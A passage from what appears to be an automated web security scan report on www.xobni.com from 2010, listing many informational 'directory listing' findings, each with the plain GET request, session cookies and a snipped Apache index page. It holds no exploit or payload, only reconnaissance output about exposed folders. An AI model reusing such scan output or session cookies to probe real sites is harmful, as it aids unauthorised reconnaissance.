Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1534
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /errors</title>
</head>
<body>
<h1>Index of /errors</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.4. http://www.xobni.com/icons/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/icons/

Request

GET /icons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

13.5. http://www.xobni.com/images/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/

Request

GET /images/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images</title>
</head>
<body>
<h1>Index of /images</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.6. http://www.xobni.com/images/badge/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/badge/

Request

GET /images/badge/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1206
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/badge</title>
</head>
<body>
<h1>Index of /images/badge</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.7. http://www.xobni.com/images/banners/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/banners/

Request

GET /images/banners/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1462
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/banners</title>
</head>
<body>
<h1>Index of /images/banners</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.8. http://www.xobni.com/images/buttons/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/buttons/

Request

GET /images/buttons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1216
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/buttons</title>
</head>
<body>
<h1>Index of /images/buttons</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.9. http://www.xobni.com/images/client/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/client/

Request

GET /images/client/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2174
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/client</title>
</head>
<body>
<h1>Index of /images/client</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.10. http://www.xobni.com/images/company/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/company/

Request

GET /images/company/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2932
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company</title>
</head>
<body>
<h1>Index of /images/company</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.11. http://www.xobni.com/images/company/adayat/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/company/adayat/

Request

GET /images/company/adayat/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/company/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3670
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company/adayat</title>
</head>
<body>
<h1>Index of /images/company/adayat</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/company/">Parent Directory</a>
...[SNIP]...

13.12. http://www.xobni.com/images/company/carousel/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/company/carousel/

Request

GET /images/company/carousel/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 7642
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company/carousel</title>
</head>
<body>
<h1>Index of /images/company/carousel</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/company/">Parent Directory</a>
...[SNIP]...

13.13. http://www.xobni.com/images/company/team/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/company/team/

Request

GET /images/company/team/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/company/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4152
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company/team</title>
</head>
<body>
<h1>Index of /images/company/team</h1>
<table><tr><th><img src="/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/company/">Parent Directory</a>
...[SNIP]...

13.14. http://www.xobni.com/images/features/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/features/

Request

GET /images/features/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2162
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/features</title>
</head>
<body>
<h1>Index of /images/features</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.15. http://www.xobni.com/images/gadgets/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/gadgets/

Request

GET /images/gadgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1248
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/gadgets</title>
</head>
<body>
<h1>Index of /images/gadgets</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.16. http://www.xobni.com/images/headers/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/headers/

Request

GET /images/headers/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1882
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/headers</title>
</head>
<body>
<h1>Index of /images/headers</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.17. http://www.xobni.com/images/highlights/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/highlights/

Request

GET /images/highlights/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1604
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/highlights</title>
</head>
<body>
<h1>Index of /images/highlights</h1>
<table><tr><th><img src="/icon
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.18. http://www.xobni.com/images/howto/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/howto/

Request

GET /images/howto/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1498
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/howto</title>
</head>
<body>
<h1>Index of /images/howto</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.19. http://www.xobni.com/images/icons/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/icons/

Request

GET /images/icons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4294
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/icons</title>
</head>
<body>
<h1>Index of /images/icons</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.20. http://www.xobni.com/images/installer/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/installer/

Request

GET /images/installer/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/installer</title>
</head>
<body>
<h1>Index of /images/installer</h1>
<table><tr><th><img src="/icons/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.21. http://www.xobni.com/images/jobs/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/jobs/

Request

GET /images/jobs/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2122
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/jobs</title>
</head>
<body>
<h1>Index of /images/jobs</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.22. http://www.xobni.com/images/linkedin_proxy/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/linkedin_proxy/

Request

GET /images/linkedin_proxy/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 846
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/linkedin_proxy</title>
</head>
<body>
<h1>Index of /images/linkedin_proxy</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.23. http://www.xobni.com/images/mascot/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/mascot/

Request

GET /images/mascot/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 830
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/mascot</title>
</head>
<body>
<h1>Index of /images/mascot</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.24. http://www.xobni.com/images/partners/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/images/partners/

Request

GET /images/partners/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3952
Connection: close
Content-Type: text/html;charset=UTF-8

